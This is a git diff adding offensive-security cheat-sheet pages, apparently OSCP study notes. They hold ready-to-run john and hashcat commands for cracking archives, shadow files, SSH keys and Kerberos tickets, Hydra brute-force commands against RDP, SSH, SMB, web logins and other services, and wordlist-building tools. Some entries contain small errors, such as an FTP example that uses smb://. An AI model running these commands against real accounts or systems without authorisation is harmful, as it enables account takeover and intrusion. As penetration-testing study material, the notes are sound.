diff --git a/docs/Password Attacks, Cracking & Decoding/Cracking Files.md b/docs/Password Attacks, Cracking & Decoding/Cracking Files.md index 8318c86b3..42e08ecd4 100644 --- a/docs/Password Attacks, Cracking & Decoding/Cracking Files.md +++ b/docs/Password Attacks, Cracking & Decoding/Cracking Files.md @@ -1 +1,87 @@ -Test \ No newline at end of file + +[Offensive Security Cheatsheet](https://cheatsheet.haax.fr/passcracking-hashfiles/cracking_files/) + + +## Cracking archives + +#### RAR +```shell +rar2john file.rar > rar_hashes.txt +john --wordlist=passwords.txt rar_hashes.txt +``` + +#### ZIP +```shell +zip2john file.rar > zip_hashes.txt +john --wordlist=passwords.txt zip_hashes.txt +``` + +#### ZIP Using fcrackzip +```shell +fcrackzip -u -D -p rockyou.txt recup.zip +``` + +## Cracking shadow files + +#### unshadow +```shell +unshadow passwd shadow > shadowjohn.txt +john --wordlist=/home/user/Desktop/Certifs/OSCP/Tools/Wordlist/Bruteforce/rockyou.txt --rules shadowjohn.txt +john --show shadowjohn.txt +``` + +#### Hashcat SHA512 $6$ shadow file +```shell +hashcat -m 1800 -a 0 hash.txt rockyou.txt --username +``` + +#### Hashcat MD5 $1$ shadow file +```shell +hashcat -m 500 -a 0 hash.txt rockyou.txt --username +``` + + +## Various cracking techniques + +#### Hashcat MD5 Apache webdav file +```shell +hashcat -m 1600 -a 0 hash.txt rockyou.txt +``` + +#### Hashcat SHA1 +```shell +hashcat -m 100 -a 0 hash.txt rockyou.txt --force +``` + +#### Hashcat Wordpress +```shell +hashcat -m 400 -a 0 --remove hash.txt rockyou.txt +``` + +#### SSH Key +```shell +ssh2john id_rsa > sshtocrack +john --wordlist=/usr/share/wordlists/rockyou.txt sshtocrack +``` + +#### Cracking Cisco passwords +Type 5 → MD5 +Type 7 → Easy reversible +```shell +hashcat -m 500 c:\temp\ciscohash.txt C:\DICS\english-dic.txt +``` + +#### Cracking NTLVMv2 hashes +```shell +john --format=netntlmv2 --wordlist="/usr/share/wordlists/rockyou.txt" hash.txt +``` +------------------------------------------------------ + +## Cracking TGS + +#### Using John from bleeding repo +```shell +Go here /home/user/Desktop/Certifs/OSCP/Tools/PasswordCracking/JohnTheRipper/run + +./john --wordlist=/home/user/Desktop/Certifs/OSCP/Tools/Wordlist/Bruteforce/rockyou.txt --fork=4 --format=krb5tgs /home/user/Desktop/HackTheBox/VM/Active/kerberos_hashes.txt +``` diff --git a/docs/Password Attacks, Cracking & Decoding/Hydra.md b/docs/Password Attacks, Cracking & Decoding/Hydra.md index 8318c86b3..c21a0136b 100644 --- a/docs/Password Attacks, Cracking & Decoding/Hydra.md +++ b/docs/Password Attacks, Cracking & Decoding/Hydra.md @@ -1 +1,126 @@ -Test \ No newline at end of file +## Hydra + +#### Hydra GUI +[xhydra](https://www.kali.org/tools/hydra/#hydra-gtk) +```bash +sudo apt install hydra-gtk +``` + + +#### RDP +```shell +hydra -V -f -L usernames.txt -P passwords.txt rdp://10.0.2.5 -V +hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip +``` + +#### SSH +```shell +hydra -l root -P passwords.txt -f ssh://10.0.2.5 -V +hydra $ip -s 22 ssh -l -P big_wordlist.txt +hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh +hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh +``` + +#### SMB +```shell +hydra -l Administrator -P passwords.txt -f smb://10.0.2.5 -V +hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb +hydra -L usernames.txt -P passwords.txt $ip smb -V -f +``` + +#### FTP +```shell +hydra -l root -P passwords.txt -f smb://10.0.2.5 -V +``` + +#### HTTP Basic Auth +```shell +hydra -L users.txt -P password.txt 10.0.2.5 http-get /login/ -V +Http get 401 login with a dictionary +hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin +``` + +#### HTTP Post +```shell +hydra -L users.txt -P password.txt 10.0.2.5 http-post-form +"/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login +name or password is incorrect" -V + +hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.216.57 http-post-form "/Account/login.aspx:__VIEWSTATE=AmInWQjOL%2BAHMc9qQ0CW0CFnlUXaqoRXEj%2FOvBixV%2Fld9p%2BKj%2B7mB%2FZ7FcrOxWmCkIjSfD9utiaSxAvSBmKz1VkaDvYW9b5sxJWoX3ZOskfQg0u3CsSjndshwiuLcEq7l%2BRc7FwwBs%2BvLvrnXfcLFt%2B0vNv1zwwLa3QoTUjG3V9hk0Sg&__EVENTVALIDATION=zMZzvwm4lfkTglvBFfLhbEjJu8yEheigLkmHJ7E8owtV2FVK0TTZdne0RExmMdPY5RORs4UuLmymoBfQmY8UwKaRwaqnpZkAM%2BPLgxPNj3wtiiTaC4jbJSUoKPCRWBtpMIz4vtdxr9zbhDPn5zB7IJSOpA%2FMzo6LYD9oiiaMKWUj8VNM&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" +``` + +#### IMAP +```shell +hydra -l root -P passwords.txt -f imap://10.0.2.5 -V +``` + +#### MySQL +```shell +hydra -L usernames.txt -P pass.txt -f mysql://10.0.2.5 -V +``` + +#### POP +```shell +hydra -l USERNAME -P passwords.txt -f pop3://10.0.2.5 -V +hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V +``` + +#### Redis +```shell +hydra –P password.txt redis://10.0.2.5 -V +``` + +#### Rexec +```shell +hydra -l root -P password.txt rexec://10.0.2.5 -V +``` + +#### Rlogin +```shell +hydra -l root -P password.txt rlogin://10.0.2.5 -V +``` + +#### RSH +```shell +hydra -L username.txt rsh://10.0.2.5 -V +``` + +#### RSP +```shell +hydra -l root -P passwords.txt rtsp +``` + +#### SNMP +```shell +hydra -P password-file.txt -v $ip snmp +``` + +#### SMTP +```shell +hydra -l -P /path/to/passwords.txt smtp -V +hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V +hydra -l -P /path/to/passwords.txt -s 587 -S -v -V +#Port 587 for SMTP with SSL +``` + +#### Telnet +```shell +hydra -l root -P passwords.txt [-t 32] telnet +``` + +#### VNC +```shell +hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s + vnc +``` + +#### Wordpress +```shell +hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' +``` + +#### LDAP +```shell +hydra -L users.txt -P passwords.txt $ip ldap2 -V -f +``` + diff --git a/docs/Password Attacks, Cracking & Decoding/Wordlists.md b/docs/Password Attacks, Cracking & Decoding/Wordlists.md index be7031091..e4d459293 100644 --- a/docs/Password Attacks, Cracking & Decoding/Wordlists.md +++ b/docs/Password Attacks, Cracking & Decoding/Wordlists.md @@ -1,30 +1,27 @@ - -> [!NOTE] Resources - +#### Wordlists references [Kaonashi](https://github.com/kaonashi-passwords/Kaonashi) [richelieu](https://github.com/tarraschk/richelieu) [rockyou](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt) [packetstormsecurity](https://packetstormsecurity.com/Crackers/wordlists/page4/) [gwicks dictionaries](http://www.gwicks.net/dictionaries.htm) - -SCADA Default Passwords +[FlameOfIgnis](https://github.com/FlameOfIgnis/Pwdb-Public) [critifence](http://www.critifence.com/default-password-database/) [weakpass](https://weakpass.com/) [berzerk0](https://github.com/berzerk0/Probable-Wordlists) -Looks very cool wordlists -[FlameOfIgnis](https://github.com/FlameOfIgnis/Pwdb-Public) +#### seclist ```shell title:"Wordlists" sudo apt-get install seclists ls /usr/share/wordlists ----------------------------------------------------------------------------------- -#CeWL -# CeWL allows you to build custom wordlists based on online resources -# If you know that your target is target.com, you can parse web content to build lists -# Can be time consuming +``` + +#### CeWL +CeWL allows you to build custom wordlists based on online resources. If you know that your target is target.com, you can parse web content to build lists. Can be time consuming. + +```bash # 5 levels of depth and minimum 7 char per word cewl -w customwordlist.txt -d 5 -m 7 www.sans.org @@ -33,21 +30,19 @@ cewl -w customwordlist.txt -d 5 -m 7 -o www.sans.org # Include e-mail adresses cewl -w customwordlist.txt -d 5 -m 7 -e www.sans.org +``` ----------------------------------------------------------------------------------- -PACK -# Password Analysis and Cracking Kit -# You can get stats about already cracked passwords -# In order to define new masks -https://github.com/iphelix/pack +#### PACK +Password Analysis and Cracking Kit. You can get stats about already cracked passwords, In order to define new masks https://github.com/iphelix/pack +```bash python statsgen.py rockyou.txt +``` + +#### Combinator +Combinator is part of the hashcat-utils. It can be used to prepare a combinated wordlist for cracking. It allows then to combination + others settings like masks or rules. ----------------------------------------------------------------------------------- -Combinator -# Combinator is part of the hashcat-utils -# It can be used to prepare a combinated wordlist for cracking -# It allows then to combination + others settings like masks or rules +```bash combinator.exe file1 file2 # It can create MASSIVE wordlists and take some time to run. @@ -59,4 +54,3 @@ combinator2.exe file1 file2 file3 combinator.exe file1 file2 | hashcat -m x hashs.file -a 0 --force -O ``` -